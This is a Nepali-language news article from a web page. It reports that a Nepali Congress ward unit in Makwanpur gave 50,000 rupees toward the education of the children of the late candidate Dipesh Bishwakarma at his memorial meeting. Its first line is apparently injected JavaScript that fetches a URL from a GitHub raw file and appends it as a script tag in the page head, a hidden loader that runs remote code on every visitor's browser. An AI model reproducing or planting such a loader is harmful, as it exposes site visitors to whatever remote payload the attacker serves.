;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०७,
काठमाडौं । नेपाली काङ्ग्रेस मकवानपुरको भिमफेदी गाउँपालिका -८ इपा वडा इकाईले वडा अध्यक्षका उम्मेदवार स्वर्गीय दिपेश बिस्वकर्माको परिवारलाई आर्थिक सहायता प्रदान गरेको छ ।
शनिबार इकाईद्वरा आयोजित विश्वकर्माको १३ औं दिनको पुण्य तिथिको अवसरमा आयोजित शोक तथा श्रद्धाञ्जली शभाको अवसर पारेर नेपाली कांग्रेस मकवानपुरको तर्फबाट इन्द्रबहादुर बानियाँले स्वर्गीय विश्वकर्माको छोराछोरीको अध्यनको लागि तत्कालका लागि नगद ५० हजार रुपैयाँ सहयोग गरेको कांग्रेसका मकवानपुर-काठमाडौं सम्पर्क समितिका अध्यक्ष पुरुषोतम ठकुरीले जुनेली न्युजलाई जानकारी दिए ।
विश्वकर्माको अल्पायूमै गत कात्तिक २५ गते निधन भएको थियो । शोक शभामा कांग्रेसका केन्द्रिय सदस्य, प्रतिनिधि सभा सदस्य उम्मेदवार तथा पूर्व जलस्रोत राज्य मन्त्री महालक्ष्मी उपाध्याय “डिना”, जिल्ला सभापति, पूर्व गृह राज्यमन्त्री, बागमती प्रदेश विपक्षी दलका नेता इन्द्रबहादुर बानियाँ ,तथा पार्टीका विभिन्न नेता कार्यकर्ताहरुको सहभागिता रहेको उनले बताए । शोकमा परेको परिवारको सधैव साथ दिने बताउदै उनले आगामी दिनमा परी सहयोग गर्ने प्रतिबद्ध जनाए ।
फेसबुक प्रतिक्रियाहरु